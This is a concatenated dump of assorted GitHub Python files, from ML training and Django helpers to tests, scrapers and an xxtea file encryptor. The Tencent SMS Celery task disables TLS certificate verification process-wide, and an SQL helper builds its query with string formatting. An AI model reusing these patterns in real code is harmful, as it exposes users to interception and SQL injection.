D3Model(mesh=f, out_dir=out_dir)\n\nmodel.form_bed_mesh()\nmodel.form_srf_mesh()\nmodel.form_lat_mesh()\nmodel.form_dvd_mesh(contour)\n\nmodel.save_bed_mesh(fn)\nmodel.save_srf_mesh(fn)\nmodel.save_lat_mesh(fn)\nmodel.save_dvd_mesh(fn)\n\nfn.close()\n\n","repo_name":"pf4d/cslvr","sub_path":"simulations/eismint_ii/gen_submeshes.py","file_name":"gen_submeshes.py","file_ext":"py","file_size_in_byte":2182,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"48"} +{"seq_id":"41785785969","text":"from urllib.error import HTTPError\nfrom urllib.error import URLError\nfrom urllib.request import urlopen\nfrom bs4 import BeautifulSoup\n\n\ndef getTitle(url):\n\ttry:\n\t\thtml = urlopen(url)\n\texcept HTTPError as err:\n\t\tprint(err)\n\texcept URLError as err:\n\t\tprint('no server found or URL mistyped')\n\ttry:\n\t\tbs = BeautifulSoup(html.read(), 'lxml')\n\t\ttitle = bs.body.h1\n\texcept AttributeError as err:\n\t\tprint('tag not found')\n\treturn title\n\ntitle = getTitle('http://www.pythonscraping.com/pages/page1.html')\nif title == None:\n\tprint('title not found')\nelse:\n\tprint(title)","repo_name":"jaikobustin/python_webscraper","sub_path":"simple.py","file_name":"simple.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17485883419","text":"from contextlib import contextmanager\nfrom typing import Any, ContextManager, Dict, Literal\n\nfrom cjwstate.models.workflow import Workflow\nfrom django.db import transaction\n\nfrom .types import HandlerError\n\n\ndef is_workflow_authorized(\n workflow: Workflow, scope: Dict[str, Any], role: Literal[\"read\", \"write\", \"owner\"]\n) -> None:\n \"\"\"Return whether user+session+has_secret can access Workflow.\n\n This queries the database. Call it within database_sync_to_async().\n \"\"\"\n user = scope[\"user\"]\n session = scope[\"session\"]\n\n if role == \"read\":\n # If the user supplied a secret and then got here, the user is authorized\n has_secret = isinstance(\n scope[\"url_route\"][\"kwargs\"][\"workflow_id_or_secret_id\"], str\n )\n return has_secret or workflow.user_session_authorized_read(user, session)\n elif role == \"write\":\n return workflow.user_session_authorized_write(user, session)\n elif role == \"owner\":\n return workflow.user_session_authorized_owner(user, session)\n\n\n@contextmanager\ndef lock_workflow_for_role(\n workflow: Workflow, scope: Dict[str, Any], role: Literal[\"read\", \"write\", \"owner\"]\n) -> ContextManager:\n \"\"\"Update Workflow, authenticate and yield; or raise HandlerError.\n\n Raise HandlerError if workflow does not exist.\n\n Raise HandlerError if request scope is not allowed role.\n\n This must be called in synchronous database code. The yielded block will\n run within a transaction in which `workflow` is guaranteed not to be\n written by any other processes.\n \"\"\"\n with transaction.atomic():\n try:\n # Lock the workflow, in the database.\n # This will block until the workflow is released.\n # https://docs.djangoproject.com/en/2.0/ref/models/querysets/#select-for-update\n #\n # list() executes the query\n list(Workflow.objects.select_for_update().filter(id=workflow.id))\n except Workflow.DoesNotExist:\n raise HandlerError(\"Workflow.DoesNotExist\")\n # save() overwrites all fields, so make sure we have the latest\n # versions.\n # https://code.djangoproject.com/ticket/28344#comment:10\n workflow.refresh_from_db() # won't fail: we're locked\n\n if not is_workflow_authorized(workflow, scope, role):\n raise HandlerError(\"AuthError: no %s access to workflow\" % (role,))\n\n yield\n","repo_name":"CJWorkbench/cjworkbench","sub_path":"server/handlers/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":2419,"program_lang":"python","lang":"en","doc_type":"code","stars":297,"dataset":"github-code","pt":"48"} +{"seq_id":"72738351185","text":"from PIL import Image, ImageDraw, ImageFont\nfrom processo import Processo\nfrom cores import Cores\n\nimport os.path\nimport io\nimport base64\n\nclass Caixa:\n width = 80\n height = 50\n \n def __init__(self, dr, pos, processo, cor=\"white\"):\n self.dr = dr\n self.pos = pos\n self.x, self.y = pos\n self.processo = processo\n \n fn = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'FreeSansBold.ttf')\n fonte_caixa = ImageFont.truetype(fn, 11)\n \n nova_pos = ((self.x, self.y), (self.x + Caixa.width, self.y + Caixa.height))\n dr.rectangle(nova_pos, fill=cor if processo is not None else \"white\", outline=\"black\")\n \n #dr.text((self.x + Caixa.width/3, self.y + Caixa.height/3), processo, fill=\"black\")\n \n #Solucao porca:\n if processo is not None:\n dr.text((self.x+2, self.y+2), \"PID: \"+str(processo.pid), fill=\"black\", font=fonte_caixa)\n dr.text((self.x+2, self.y+10), \"Tempo R.: \"+str(processo.tempo_restante), fill=\"black\", font=fonte_caixa)\n dr.text((self.x+2, self.y+10*2), \"Tempo T.: \"+str(processo.tempo_necessario), fill=\"black\", font=fonte_caixa)\n dr.text((self.x+2, self.y+10*3), \"Memo.: \"+str(processo.memoria_necessaria), fill=\"black\", font=fonte_caixa)\n\nclass Desenho():\n \n def __init__(self, escalonador):\n fila = escalonador.aptos if escalonador.algoritimo != \"Fila de Prioridade com RoundRobin\" else escalonador.filas\n self.quantum = escalonador.quantum\n self.algoritimo = escalonador.algoritimo\n self.cores = escalonador.cores\n self.RAM = escalonador.memoria.RAM\n self.fila_aptos = fila\n \n self.tamanho_fila = len(self.fila_aptos)\n self.tamanho_fonte = 12\n self.isFilaPrioridade = True if self.algoritimo == \"Fila de Prioridade com RoundRobin\" else False\n \n self.multiplicador = 4 if self.isFilaPrioridade else 1\n tamanho_multiplicador = 10 if self.multiplicador == 4 else 1 #Gambiarra\n \n self.x = 1200\n \n self.max_filas = (1200 / Caixa.width) - 2 #Calculado a partir de muitas e muitas tentativas\n self.y = (130 + self.tamanho_fonte + (self.tamanho_fila / self.max_filas + 1) \\\n * Caixa.height * tamanho_multiplicador) + 100\n \n self.im = Image.new('RGB', (self.x, self.y), \"white\")\n self.dr = ImageDraw.Draw(self.im)\n \n #print \"Chegou ate aqui...\"\n fn = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'FreeSansBold.ttf')\n self.fonte = ImageFont.truetype(fn, self.tamanho_fonte)\n self.fonte_titulo = ImageFont.truetype(fn, 22)\n \n self.dr.setfont(self.fonte)\n \n def draw(self):\n dr = self.dr\n \n dr.text((5, 5), \"Quantum: \"+str(self.quantum), fill=\"black\")\n dr.text((self.x/2, 5), self.algoritimo, fill=\"black\", font=self.fonte_titulo)\n dr.text((30, 35+self.tamanho_fonte), \"Cores:\", fill=\"black\")\n \n #Desenha os cores\n pos = 0\n for i in self.cores.cores:\n if(i == None):\n Caixa(dr, (35+pos*Caixa.width, 60), None, \"#00FF00\")\n else:\n Caixa(dr, (35+pos*Caixa.width, 60), i, \"#00FF00\")\n pos += 1\n\n #Desenha a Memoria Virtual\n blocos_ram = len(self.RAM.pos)\n pos_inicial = 70+Caixa.height\n dr.text((30, pos_inicial), \"Memoria Virtual (RAM):\", fill=\"black\")\n #dr.text((blocos_ram * Caixa.width + 60, pos_inicial), \"Disco:\", fill=\"black\")\n\n for pos in range(blocos_ram):\n Caixa(dr, (35+pos*Caixa.width, pos_inicial+15), self.RAM.pos[pos].conteudo, \"#FFFFFF\")\n tamanho = self.RAM.pos[pos].tamanho\n dr.text(((35+pos*Caixa.width)+(Caixa.width / 3.), pos_inicial+15+Caixa.height+5), str(tamanho)+\"KB\", fill=\"black\")\n\n pos_inicial += 40 + Caixa.height\n dr.text((30, pos_inicial), \"Fila de aptos:\", fill=\"black\") #Ta certo...\n \n m = self.max_filas\n\n #Desenha a fila de aptos\n fila = [self.fila_aptos] if not self.isFilaPrioridade else self.fila_aptos\n for k in range(self.multiplicador):\n tamanho = len(fila[k])\n for i in range(tamanho/m + 1):\n if tamanho < m:\n aux = tamanho\n else:\n aux = m\n tamanho -= m\n \n cont = 0\n for j in range(aux):\n Caixa(dr, (30+j*Caixa.width, \n ((pos_inicial + 5) + 35 * k * 2) \\\n + self.tamanho_fonte+i*Caixa.height), fila[k][cont], \"#FF5252\")\n cont += 1\n \n self.quantum += 1\n \n #Salva a imagem\n output = io.BytesIO()\n self.im.save(output, format='JPEG')\n binary = output.getvalue()\n encoded = base64.b64encode(binary)\n return encoded\n","repo_name":"Ziggoto/escalonador-so","sub_path":"core/desenha.py","file_name":"desenha.py","file_ext":"py","file_size_in_byte":5016,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"30202898914","text":"import pytest\nfrom http import HTTPStatus\nfrom unittest.mock import patch\n\nfrom legal_api.models import Business, RequestTracker, UserRoles\nfrom legal_api.resources.v2 import request_tracker\n\nfrom tests.unit.models import factory_business\nfrom tests.unit.services.utils import create_header\n\n\ndef test_get_bn_request_trackers(session, client, jwt):\n \"\"\"Get all BN request.\"\"\"\n identifier = 'FM0000001'\n business = factory_business(identifier, entity_type=Business.LegalTypes.SOLE_PROP.value)\n\n request_tracker = RequestTracker(\n request_type=RequestTracker.RequestType.INFORM_CRA,\n retry_number=-1,\n service_name=RequestTracker.ServiceName.BN_HUB,\n business_id=business.id,\n request_object=''\n )\n request_tracker.save()\n\n rv = client.get(f'/api/v2/requestTracker/bn/{identifier}',\n headers=create_header(jwt, [UserRoles.bn_edit], identifier))\n\n assert rv.status_code == HTTPStatus.OK\n assert rv.json['requestTrackers'][0]['id'] == request_tracker.id\n assert rv.json['requestTrackers'][0]['requestType'] == request_tracker.request_type.name\n assert rv.json['requestTrackers'][0]['isProcessed'] == request_tracker.is_processed\n assert rv.json['requestTrackers'][0]['serviceName'] == request_tracker.service_name.name\n assert rv.json['requestTrackers'][0]['isAdmin'] == request_tracker.is_admin\n\n\ndef test_get_request_tracker(session, client, jwt):\n \"\"\"Get request tracker.\"\"\"\n identifier = 'FM0000001'\n business = factory_business(identifier, entity_type=Business.LegalTypes.SOLE_PROP.value)\n\n request_tracker = RequestTracker(\n request_type=RequestTracker.RequestType.INFORM_CRA,\n retry_number=-1,\n service_name=RequestTracker.ServiceName.BN_HUB,\n business_id=business.id,\n request_object='',\n response_object=''\n )\n request_tracker.save()\n\n rv = client.get(f'/api/v2/requestTracker/{request_tracker.id}',\n headers=create_header(jwt, [UserRoles.bn_edit], identifier))\n\n assert rv.status_code == HTTPStatus.OK\n assert rv.json['id'] == request_tracker.id\n assert rv.json['requestType'] == request_tracker.request_type.name\n assert rv.json['isProcessed'] == request_tracker.is_processed\n assert rv.json['serviceName'] == request_tracker.service_name.name\n assert rv.json['isAdmin'] == request_tracker.is_admin\n assert rv.json['request'] == request_tracker.request_object\n assert rv.json['response'] == request_tracker.response_object\n\n\n@pytest.mark.parametrize('request_type, request_xml', [\n (RequestTracker.RequestType.INFORM_CRA, ''),\n (RequestTracker.RequestType.CHANGE_DELIVERY_ADDRESS, ''),\n (RequestTracker.RequestType.CHANGE_MAILING_ADDRESS, ''),\n (RequestTracker.RequestType.CHANGE_NAME, ''),\n (RequestTracker.RequestType.CHANGE_PARTY, ''),\n (RequestTracker.RequestType.CHANGE_STATUS, ''),\n])\ndef test_resubmit_bn_request(session, client, jwt, request_type, request_xml):\n \"\"\"Get all BN request.\"\"\"\n identifier = 'FM0000001'\n business = factory_business(identifier, entity_type=Business.LegalTypes.SOLE_PROP.value)\n json_data = {\n 'requestType': request_type.name,\n 'request': request_xml\n }\n with patch.object(request_tracker, 'publish_entity_event'):\n rv = client.post(f'/api/v2/requestTracker/bn/{identifier}',\n headers=create_header(jwt, [UserRoles.bn_edit], identifier),\n json=json_data)\n\n assert rv.status_code == HTTPStatus.OK\n\n request_trackers = RequestTracker.find_by(business.id,\n RequestTracker.ServiceName.BN_HUB,\n request_type=request_type)\n assert request_trackers[0].request_object == request_xml\n assert request_trackers[0].is_admin\n assert request_trackers[0].message_id\n","repo_name":"bcgov/lear","sub_path":"legal-api/tests/unit/resources/v2/test_request_tracker.py","file_name":"test_request_tracker.py","file_ext":"py","file_size_in_byte":4338,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"48"} +{"seq_id":"8921719719","text":"# function with var num of arguments\n# *a represents we are passing multiple arg\n\ndef sum(*a):\n # print(a)\n s = 0\n for x in a:\n s = s+x\n return s\n\nz = sum(10,20,30,40,50)\nprint(z)\nz = sum(10,20,30,40,50,60,70)\nprint(z)\nz = sum(10,20)\nprint(z)\n","repo_name":"KaranKadam1/Python","sub_path":"CLASS PROGRAMS/func11.py","file_name":"func11.py","file_ext":"py","file_size_in_byte":262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42535548236","text":"from .test_metrics import dice, iou, SegmentationMetricMode\nimport numpy as np\nfrom enum import Enum\n\nclass SegmentationMetricReductionMode(Enum):\n\n EMPTY_SET_IGNORE_BINARY_NO_BG = \"empty_set_ignore_binary_no_bg\"\n EMPTY_SET_IGNORE_MULTICLASS_NO_BG = \"empty_set_ignore_multiclass_no_bg\"\n NONE = \"none\"\n\nclass PerformanceMeter(object):\n\n def __init__(self, scoring_function):\n self.scoring_function = scoring_function\n\n def get_final_metric(self):\n pass\n\nclass SegmentationMeter(PerformanceMeter):\n\n def __init__(self, n_classes, scoring_function, mode, reduction_mode):\n super(SegmentationMeter, self).__init__(scoring_function=scoring_function)\n self.top = 0\n self.bottom = 0\n self.epsilon = 0.000001\n self.n_classes = n_classes\n self.mode = mode\n self.reduction_mode = reduction_mode\n\n def update(self, prediction, target):\n\n if self.reduction_mode != SegmentationMetricReductionMode.NONE:\n _, t, b = self.scoring_function(prediction, target, num_classes=self.n_classes, segmentation_mode=self.mode)\n else:\n _, t, b, _ = self.scoring_function(prediction, target)\n\n if self.reduction_mode == SegmentationMetricReductionMode.EMPTY_SET_IGNORE_BINARY_NO_BG:\n self.top += t[1] if not np.isnan(b[1:])[0] else 0\n self.bottom += b[1] if not np.isnan(b[1:])[0] else 0\n elif self.reduction_mode == SegmentationMetricReductionMode.EMPTY_SET_IGNORE_MULTICLASS_NO_BG:\n self.top += t[1:][~np.isnan(t[1:])].sum() # don't include first class (bg)\n self.bottom += b[1:][~np.isnan(b[1:])].sum() # don't include first class (bg)\n elif self.reduction_mode == SegmentationMetricReductionMode.NONE:\n self.top += t.item()\n self.bottom += b.item()\n else:\n raise Exception(f'Segmentation metric mode {self.reduction_mode} not implemented yet.')\n\n def get_final_metric(self):\n return self.top / (self.bottom + self.epsilon)\n\nclass DiceMeter(SegmentationMeter):\n\n def __init__(self, n_classes, reduction_mode, mode=SegmentationMetricMode.EMPTY_SET_IGNORE):\n super(DiceMeter, self).__init__(\n n_classes=n_classes,\n scoring_function=dice,\n mode=mode,\n reduction_mode=reduction_mode\n )\n\nclass LegacySegmentationMeter(SegmentationMeter):\n\n def __init__(self, n_classes, scoring_function):\n super(LegacySegmentationMeter, self).__init__(\n n_classes=n_classes,\n scoring_function=scoring_function,\n mode=None,\n reduction_mode=SegmentationMetricReductionMode.NONE\n )\n\nclass IoUMeter(SegmentationMeter):\n\n def __init__(self, n_classes, reduction_mode, mode=SegmentationMetricMode.EMPTY_SET_IGNORE):\n super(IoUMeter, self).__init__(\n n_classes=n_classes,\n scoring_function=iou,\n mode=mode,\n reduction_mode=reduction_mode\n )\n","repo_name":"EliasPa/thesis-ssl-ich-segmentation","sub_path":"networks/metrics/meters.py","file_name":"meters.py","file_ext":"py","file_size_in_byte":3006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26001234505","text":"import logging\n\nfrom aiogram.dispatcher.middlewares import BaseMiddleware\nfrom aiogram.types import Update\n\n\nclass BigBrother(BaseMiddleware):\n async def on_pre_process_update(self, update: Update, data: dict):\n logging.info(\"[------------------Новый апдейт!------------------]\")\n logging.info(\"1. Pre Process Update\")\n logging.info(\"Следующая точка: Process Update\")\n data[\"middleware_data\"] = \"Это пройдет до on_process_update\"\n\n banned_users = [1234567]","repo_name":"rebos2/telegram_bot","sub_path":"tgbot/middlewares/big_brother.py","file_name":"big_brother.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7784503326","text":"from database import executor\n\ndef by_article_id(article_id):\n \"\"\"\n Get the title based on article id\n\n Locations: display.display_articles(), rename.rename()\n\n Parameters:\n article_id (int)\n\n Returns:\n title (string)\n \"\"\"\n sql = \"SELECT article_title FROM articles WHERE article_id = {}\".format(article_id)\n c = executor.select(sql)\n return c[0][0]\n\ndef all():\n \"\"\"\n Get all the titles\n\n Returns:\n titles (list): a list of all the titles in the table\n \"\"\"\n titles = []\n sql = \"SELECT article_title, full_number FROM articles\"\n c = executor.select(sql)\n for x in c:\n titles.append((x[0], x[1]))\n return titles\n","repo_name":"unquenchedservant/JETS","sub_path":"database/get_title.py","file_name":"get_title.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36155658948","text":"import argparse\nfrom datetime import datetime\nimport multiprocessing as mp\nimport os\nimport os.path as osp\nimport sys\nimport tensorflow as tf\n\nimport utils\nfrom trainer import trainer\nfrom train_manager import train_manager\nfrom player import player\nfrom player_manager import player_manager\n\nconfig_proto = tf.ConfigProto()\nconfig_proto.gpu_options.allow_growth = True\ntf.enable_eager_execution(config=config_proto)\n\n\ndef main():\n args = parse_args()\n\n valid_modes_list = utils.get_valid_game_modes()\n valid_modes_string = utils.get_valid_game_modes_string()\n if args.mode not in valid_modes_list:\n print('Invalid game mode informed. Please inform a mode with ' +\n '--mode=mode_name, where mode_name is one of the following ' +\n '{%s}' % valid_modes_string)\n sys.exit()\n\n args.gpu_id = [int(x) for x in args.gpu_id]\n\n gconf = utils.get_game_config(args.mode, 'test')\n\n if len(args.gpu_id) == 0:\n player_gpu_ids = [-1 for _ in range(args.num_player_processes)]\n elif len(args.gpu_id) == 1:\n player_gpu_ids = [\n args.gpu_id[0] for _ in range(args.num_player_processes)]\n else:\n # Leave first GPU for training and the others for playing\n gpus_for_players = args.gpu_id[1:]\n player_gpu_ids = []\n num_repetitions = (args.num_player_processes //\n len(gpus_for_players) + 1)\n for _ in range(num_repetitions):\n player_gpu_ids += gpus_for_players\n player_gpu_ids = player_gpu_ids[:args.num_player_processes]\n\n print('Player gpu ids', player_gpu_ids)\n\n if args.game_type == 'moku':\n (game_config_string, game_manager_module, game_manager_kwargs,\n _, _) = \\\n utils.generate_moku_manager_params(\n gconf.drop_mode, gconf.moku_size, gconf.board_size,\n args.gpu_id[0], gconf.num_res_layers, gconf.num_channels)\n else:\n raise NotImplementedError(\n 'Game type %s is not supported.' % args.game_type)\n\n max_ckpts_to_keep = 1\n\n players_game_manager_kwargs = []\n for gpu_id in player_gpu_ids:\n if args.game_type == 'moku':\n (game_config_string, game_manager_module, game_manager_kwargs,\n _, _) = \\\n utils.generate_moku_manager_params(\n gconf.drop_mode, gconf.moku_size, gconf.board_size,\n gpu_id, gconf.num_res_layers, gconf.num_channels)\n else:\n raise NotImplementedError(\n 'Game type %s is not supported.' % args.game_type)\n players_game_manager_kwargs.append(game_manager_kwargs)\n\n train_dir = osp.join('train_files', game_config_string)\n\n os.makedirs(train_dir, exist_ok=True)\n\n ckpt_path = None\n ckpt = tf.train.get_checkpoint_state(train_dir)\n if ckpt and ckpt.model_checkpoint_path:\n ckpt_path = ckpt.model_checkpoint_path\n\n game_manager_kwargs['ckpt_path'] = ckpt_path\n\n trmanager_trainer_queue = mp.Queue(gconf.queue_capacity)\n trainer_trmanager_queue = mp.Queue(1)\n\n print('%s: Starting trainer' % datetime.now().strftime(\n '%Y_%m_%d_%H_%M_%S'))\n\n player_trmanager_queue = mp.Queue(gconf.queue_capacity)\n trmanager_plmanager_queue = mp.Queue(gconf.queue_capacity)\n\n train_manager_p = mp.Process(\n target=train_manager, args=(\n player_trmanager_queue, trmanager_plmanager_queue,\n trainer_trmanager_queue, trmanager_trainer_queue, train_dir,\n gconf.max_samples_per_result_to_train,\n gconf.num_games_per_checkpoint, gconf.train_batch_size,\n gconf.augment_training_samples, gconf.use_relative_value_labels,\n game_config_string, game_manager_module, game_manager_kwargs))\n train_manager_p.daemon = True\n train_manager_p.start()\n\n plmanager_player_queue = mp.Queue(gconf.queue_capacity)\n\n print('%s: Launching players' % datetime.now().strftime(\n '%Y_%m_%d_%H_%M_%S'))\n\n players_p = [mp.Process(\n target=player, args=(\n player_trmanager_queue, plmanager_player_queue,\n train_dir, gconf.max_simulations_per_move,\n gconf.max_seconds_per_move, gconf.move_temperature,\n gconf.num_relaxed_turns, gconf.random_move_probability,\n gconf.cpuct, gconf.virtual_loss, gconf.root_noise_weight,\n gconf.dirichlet_noise_param, gconf.eval_batch_size,\n game_manager_module, players_game_manager_kwargs[i],\n )\n ) for i in range(args.num_player_processes)]\n for p in players_p:\n p.daemon = True\n p.start()\n\n plmanager_fileclient_queue = None\n fileclient_plmanager_queue = None\n player_manager_p = mp.Process(\n target=player_manager, args=(\n trmanager_plmanager_queue, plmanager_player_queue,\n plmanager_fileclient_queue, fileclient_plmanager_queue,\n train_dir, max_ckpts_to_keep,))\n player_manager_p.daemon = True\n player_manager_p.start()\n\n trainer(trmanager_trainer_queue, trainer_trmanager_queue,\n train_dir, gconf.train_batch_size, gconf.save_ckpt_interval,\n gconf.max_train_iters, gconf.initial_lr, gconf.lr_decay,\n gconf.lr_decay_steps, gconf.log_interval,\n gconf.backpropagate_losing_policies,\n gconf.keep_checkpoint_every_n_hours, game_config_string,\n game_manager_module, game_manager_kwargs)\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n valid_modes = utils.get_valid_game_modes_string()\n parser.add_argument(\n '--mode',\n help=('A valid game mode name. valid modes are {%s}.' % valid_modes),\n default=None\n )\n parser.add_argument(\n '--gpu_id',\n nargs='+',\n help=('List (separated by spaces) of GPU ids to use, or -1 to use ' +\n 'the CPU.'),\n default=['0']\n )\n parser.add_argument(\n '--game_type',\n help=('Type is a more general term which may include many game ' +\n 'modes. For example, moku is the type of tictactoe, connect4 ' +\n 'and gomoku modes.'),\n default='moku'\n )\n parser.add_argument(\n '-n',\n '--num_player_processes',\n help=('Number of parallel player processes to run.'),\n default=3,\n type=int\n )\n args = parser.parse_args()\n return args\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"hmorimitsu/moku-zero","sub_path":"launch_local_train.py","file_name":"launch_local_train.py","file_ext":"py","file_size_in_byte":6452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30135215677","text":"\"\"\"\nAUTHOR: zeng_xiao_yu\nGITHUB: https://github.com/zengxiaolou\nEMAIL: zengevent@gmail.com\nTIME: 2020/9/13-17:43\nINSTRUCTIONS: 异步发送邮件\n\"\"\"\nfrom __future__ import absolute_import, unicode_literals\n\nimport logging\nimport ssl\n\nfrom celery import shared_task\nfrom django.core.mail import send_mail\n\nfrom tencentcloud.common import credential\nfrom tencentcloud.common.exception.tencent_cloud_sdk_exception import TencentCloudSDKException\n# 导入 SMS 模块的client models\nfrom tencentcloud.sms.v20190711 import sms_client, models\n\n# 导入可选配置类\nfrom tencentcloud.common.profile.client_profile import ClientProfile\nfrom tencentcloud.common.profile.http_profile import HttpProfile\n\nfrom main.settings import TENCENT_SECRETID, TENCENT_SECRETKEY, TENCENT_SMSSDKAPPID, TENCENT_SIGN, TENCENT_TEMPLATEID\n\nlogger = logging.getLogger('django_log')\n\n\n@shared_task\ndef send_mails(theme: str, code: str, account: str):\n \"\"\"发送邮件\"\"\"\n send_mail(\n theme,\n '您的验证码为\\n ' + code + \"\\n有效期为5分钟\",\n '18328457630@163.com',\n ['18328457630@163.com', account],\n fail_silently=False\n )\n\n\n@shared_task\ndef send_sms(mobile=None, code=None):\n \"\"\"发送短信\"\"\"\n try:\n # 必要步骤:\n # 实例化一个认证对象,入参需要传入腾讯云账户密钥对 secretId 和 secretKey\n # 本示例采用从环境变量读取的方式,需要预先在环境变量中设置这两个值\n # 您也可以直接在代码中写入密钥对,但需谨防泄露,不要将代码复制、上传或者分享给他人\n # CAM 密钥查询:https://console.cloud.tencent.com/cam/capi\n cred = credential.Credential(TENCENT_SECRETID, TENCENT_SECRETKEY)\n ssl._create_default_https_context = ssl._create_unverified_context\n # cred = credential.Credential(\n # os.environ.get(\"\"),\n # os.environ.get(\"\")\n # )\n\n # 实例化一个 http 选项,可选,无特殊需求时可以跳过\n httpProfile = HttpProfile()\n httpProfile.reqMethod = \"POST\" # POST 请求(默认为 POST 请求)\n httpProfile.reqTimeout = 60 # 请求超时时间,单位为秒(默认60秒)\n httpProfile.endpoint = \"sms.tencentcloudapi.com\" # 指定接入地域域名(默认就近接入)\n\n # 非必要步骤:\n # 实例化一个客户端配置对象,可以指定超时时间等配置\n clientProfile = ClientProfile()\n clientProfile.signMethod = \"TC3-HMAC-SHA256\" # 指定签名算法\n clientProfile.language = \"en-US\"\n clientProfile.httpProfile = httpProfile\n\n # 实例化 SMS 的 client 对象\n # 第二个参数是地域信息,可以直接填写字符串 ap-guangzhou,或者引用预设的常量\n client = sms_client.SmsClient(cred, \"ap-guangzhou\", clientProfile)\n\n # 实例化一个请求对象,根据调用的接口和实际情况,可以进一步设置请求参数\n # 您可以直接查询 SDK 源码确定 SendSmsRequest 有哪些属性可以设置\n # 属性可能是基本类型,也可能引用了另一个数据结构\n # 推荐使用 IDE 进行开发,可以方便的跳转查阅各个接口和数据结构的文档说明\n req = models.SendSmsRequest()\n\n # 基本类型的设置:\n # SDK 采用的是指针风格指定参数,即使对于基本类型也需要用指针来对参数赋值\n # SDK 提供对基本类型的指针引用封装函数\n # 帮助链接:\n # 短信控制台:https://console.cloud.tencent.com/smsv2\n # sms helper:https://cloud.tencent.com/document/product/382/3773\n\n # 短信应用 ID: 在 [短信控制台] 添加应用后生成的实际 SDKAppID,例如1400006666\n req.SmsSdkAppid = TENCENT_SMSSDKAPPID\n # 短信签名内容: 使用 UTF-8 编码,必须填写已审核通过的签名,可登录 [短信控制台] 查看签名信息\n req.Sign = TENCENT_SIGN\n # 短信码号扩展号: 默认未开通,如需开通请联系 [sms helper]\n req.ExtendCode = \"\"\n # 用户的 session 内容: 可以携带用户侧 ID 等上下文信息,server 会原样返回\n req.SessionContext = \"xxx\"\n # 国际/港澳台短信 senderid: 国内短信填空,默认未开通,如需开通请联系 [sms helper]\n req.SenderId = \"\"\n # 下发手机号码,采用 e.164 标准,+[国家或地区码][手机号]\n # 例如+8613711112222, 其中前面有一个+号 ,86为国家码,13711112222为手机号,最多不要超过200个手机号\n req.PhoneNumberSet = [\"+86\" + mobile]\n # 模板 ID: 必须填写已审核通过的模板 ID,可登录 [短信控制台] 查看模板 ID\n req.TemplateID = TENCENT_TEMPLATEID\n # 模板参数: 若无模板参数,则设置为空\n req.TemplateParamSet = [code]\n\n # 通过 client 对象调用 SendSms 方法发起请求。注意请求方法名与请求对象是对应的\n resp = client.SendSms(req)\n\n # 输出 JSON 格式的字符串回包\n logger.info(resp.to_json_string(indent=2))\n\n except TencentCloudSDKException as err:\n logger.info(err)\n\n","repo_name":"zengxiaolou/blog-back","sub_path":"apis/utils/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":5308,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"32684501846","text":"import sys\nimport os\nimport traceback\nimport glob\nimport string\nimport struct\nimport subprocess\n\n_DELTA = 0x9E3779B9\n\ndef _long2str(v, w):\n n = (len(v) - 1) << 2\n if w:\n m = v[-1]\n if (m < n - 3) or (m > n): return ''\n n = m\n s = struct.pack('<%iL' % len(v), *v)\n return s[0:n] if w else s\n\ndef _str2long(s, w):\n n = len(s)\n m = (4 - (n & 3) & 3) + n\n s = s.ljust(m, \"\\0\")\n v = list(struct.unpack('<%iL' % (m >> 2), s))\n if w: v.append(n)\n return v\n\ndef encrypt(str, key):\n if str == '': return str\n v = _str2long(str, True)\n k = _str2long(key.ljust(16, \"\\0\"), False)\n n = len(v) - 1\n z = v[n]\n y = v[0]\n sum = 0\n q = 6 + 52 // (n + 1)\n while q > 0:\n sum = (sum + _DELTA) & 0xffffffff\n e = sum >> 2 & 3\n for p in xrange(n):\n y = v[p + 1]\n v[p] = (v[p] + ((z >> 5 ^ y << 2) + (y >> 3 ^ z << 4) ^ (sum ^ y) + (k[p & 3 ^ e] ^ z))) & 0xffffffff\n z = v[p]\n y = v[0]\n v[n] = (v[n] + ((z >> 5 ^ y << 2) + (y >> 3 ^ z << 4) ^ (sum ^ y) + (k[n & 3 ^ e] ^ z))) & 0xffffffff\n z = v[n]\n q -= 1\n return _long2str(v, False)\n\ndef _run_cmd(command):\n ret = subprocess.call(command, shell=True)\n if ret != 0:\n message = 'Error running command'\n raise Error(message)\n\ndef main():\n workpath = os.path.dirname(os.path.realpath(__file__))\n outpath = os.path.join(workpath, 'xxtea')\n\n try:\n os.makedirs(outpath)\n except OSError:\n if (os.path.exists(outpath) == False):\n raise Error(\"Error: cannot create folder\" + outpath)\n\n print('=======================================================')\n print('==> Begin to xxtea!')\n\n filelist = glob.glob('./*.json')\n for filename in filelist:\n print(os.path.join(outpath, filename))\n newfile = os.path.join(outpath, filename)\n _run_cmd('copy ' + filename + ' ' + newfile)\n bytesFile = open(newfile, \"rb+\")\n encryBytes = encrypt(bytesFile.read(), 'tinygame')\n encryBytes = 'tinygame' + encryBytes\n bytesFile.seek(0)\n bytesFile.write(encryBytes)\n bytesFile.close()\n\n print('==> Completed!')\n\n# -------------- main --------------\nif __name__ == '__main__':\n try:\n main()\n os.system(\"pause\")\n except Exception as e:\n traceback.print_exc()\n 